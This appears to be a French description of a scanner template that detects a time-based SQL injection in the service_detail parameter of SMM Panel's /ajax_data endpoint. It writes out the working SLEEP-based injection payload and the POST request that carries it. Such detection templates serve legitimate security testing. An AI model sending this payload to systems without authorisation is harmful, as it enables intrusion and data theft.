
Modèle de détection d’injection SQL basée sur le temps pour SMM Panel, ciblant le paramètre service_detail via des requêtes POST élaborées vers /ajax_data, en utilisant le délai de réponse pour confirmer la vulnérabilité.
Détection d'injection SQL basée sur le temps pour SMM Panel
Ce modèle détecte une vulnérabilité d'injection SQL basée sur le temps dans le paramètre service_detail du SMM Panel via des requêtes HTTP POST vers /ajax_data. L'exploitation peut permettre à des attaquants distants d'accéder à des données sensibles ou d'élever leurs privilèges.
L'outil envoie une requête POST malveillante :
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
Si le temps de réponse est supérieur à 5 secondes, cela indique un point de terminaison vulnérable.
- Méthode : POST
- Chemin : {{BaseURL}}/ajax_data
- En-têtes : Content-Type: application/x-www-form-urlencoded
- Corps : action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Correspondance : durée > 5 secondes
